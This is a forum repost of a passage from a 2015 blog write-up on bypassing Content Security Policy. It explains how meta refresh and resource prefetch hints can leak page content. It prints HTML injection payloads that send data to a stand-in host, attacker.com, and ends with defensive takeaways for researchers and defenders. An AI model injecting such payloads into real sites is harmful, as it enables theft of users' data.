Nytro Posted November 26, 2015 Report Posted November 26, 2015 (the injected part is "><meta http-equiv="refresh" content='0;url=http://attacker.com/?>)Since browsers can handle only 1 redirection, they have to pick up only 1 among the three. Some browsers use the first one and some use the last one, but never the middle one. That is troublesome because we only care about the middle one.Now think about it: does CSP really cover all the possible ways to fetch resources? Another no.HTTPLeaks is a project that aims to enumerate all possible ways browsers leak requests. They can be something specific to browsers, features that defined by new specifications and whatnot. The most important thing is some of them will not be caught by CSP. In the attack I used prefetch from Resource Hints.Finally We just need to prevent the intended redirection so that our prefetch request will not be dropped. This can be done using javascript: pseudo protocol as browsers refuse to navigate to it in meta refresh. Now everything is set, and the final payload:javascript:"><link rel=prefetch href='//attacker.com/?...Hooray! Access granted. CSP: 0.5 - Attacker 2.5. Fatality.You can find the original report from HackerOne.TakeawayA proper policy can significantly reduce the chance of XSSBeware of the nonce pitfallContent Exfiltration may be Achilles' Heel of CSPAll in all, CSP does not replace input validationSursa: http://blog.innerht.ml/csp-2015/ Quote
